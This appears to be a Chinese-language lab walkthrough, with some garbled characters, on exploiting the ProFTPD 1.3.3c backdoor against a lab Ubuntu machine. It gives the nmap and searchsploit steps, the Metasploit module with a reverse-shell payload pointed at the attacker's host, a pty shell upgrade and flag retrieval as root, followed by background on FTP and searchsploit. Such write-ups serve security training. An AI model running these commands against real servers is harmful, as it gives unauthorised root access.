FTP服务后门利用
靶場(chǎng): ubuntu 192.168.142.128
攻擊機(jī): kali? 192.168.11.165
信息收集:
探測(cè)服務(wù)信息:
nmap -sV 192.168.142.128可以看到靶機(jī)開啟了 21 ftp服務(wù),版本號(hào)為?ProFTPD 1.3.3c
使用 searchsploit 查看漏洞信息,找到可以利用的溢出代碼
可以看到有兩個(gè)可以用的漏洞,
第一個(gè)是 遠(yuǎn)程后門 ,后面有漏洞利用的代碼,
第二個(gè)漏洞利用 集成到了 metasploit 中 ,可以利用 metasploit進(jìn)行更簡(jiǎn)單的操作
打開 metasploit framwork: msfconsole
搜索可以使用的模塊:
我們選用 第4 個(gè)模塊
use exploit/unix/ftp/proftpd_133c_backdoor接著設(shè)置payload,
先看看有哪些可以使用的payload:
show payloads這里使用 第 3 個(gè)
set payload cmd/unix/reverse然后查看還需要哪些設(shè)置:
show options還需要設(shè)置 rhost 目標(biāo)ip? 和 lhost 監(jiān)聽ip
set rhost 192.168.142.128set lhost 192.168.11.165設(shè)置好了 ,啟動(dòng)
exploit可以看到 已經(jīng)成功 侵入,并且權(quán)限是 root
優(yōu)化一下 命令行:
python -c "import pty; pty.spawn('/bin/bash')"切換到 /root 目錄下獲取fllag
?
充電站:
1,什么是 FTP?
是文件傳輸協(xié)議的簡(jiǎn)稱。用于Internet上的控制文件的雙向傳輸。同時(shí),它也是一個(gè)應(yīng)用程序(Application)。用戶可以通過它把自己的PC機(jī)與世界各地所有運(yùn)行FTP協(xié)議的服務(wù)器相連,訪問服務(wù)器上的大量程序和信息。
FTP 是因特網(wǎng)網(wǎng)絡(luò)上歷史最悠久的網(wǎng)絡(luò)工具,從 1971 年由 A KBHUSHAN 提出第一個(gè) FTP 的RFC(RFC114)?[2]??至今近半個(gè)世紀(jì)來,FTP 憑借其獨(dú)特的優(yōu)勢(shì)一直都是因特網(wǎng)中最重要、最廣泛的服務(wù)之一。?[3]?
FTP 的目標(biāo)是提高文件的共享性,提供非直接使用遠(yuǎn)程計(jì)算機(jī),使存儲(chǔ)介質(zhì)對(duì)用戶透明和可靠高效地傳送數(shù)據(jù)。它能操作任何類型的文件而不需要進(jìn)一步處理,就像MIME或Unicode一樣。但是,FTP有著極高的延時(shí),這意味著,從開始請(qǐng)求到第一次接收需求數(shù)據(jù)之間的時(shí)間,會(huì)非常長(zhǎng);并且不時(shí)的必須執(zhí)行一些冗長(zhǎng)的登錄進(jìn)程
2, searchsploit 是什么?
顧名思義,它將搜索所有的漏洞和shellcode。它不會(huì)包含任何文件和谷歌黑客數(shù)據(jù)庫(kù)的結(jié)果
earchSploit為您提供了在本地保存的存儲(chǔ)庫(kù)中執(zhí)行詳細(xì)的離線搜索的能力。這種能力特別適用于在沒有互聯(lián)網(wǎng)接入的情況下對(duì)網(wǎng)絡(luò)進(jìn)行安全評(píng)估。許多漏洞都包含了二進(jìn)制文件的鏈接,這些文件不包含在標(biāo)準(zhǔn)存儲(chǔ)庫(kù)中,但可以在我們的Exploit-DB二進(jìn)制文件中找到。
如果您預(yù)計(jì)您將在一個(gè)沒有Internet的網(wǎng)絡(luò)環(huán)境進(jìn)行滲透測(cè)試,請(qǐng)確保您檢查了兩個(gè)存儲(chǔ)庫(kù),以獲得最完整的數(shù)據(jù)集
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
總結(jié)
- 上一篇: metasploit framework
- 下一篇: upload总结及一般处理思路步骤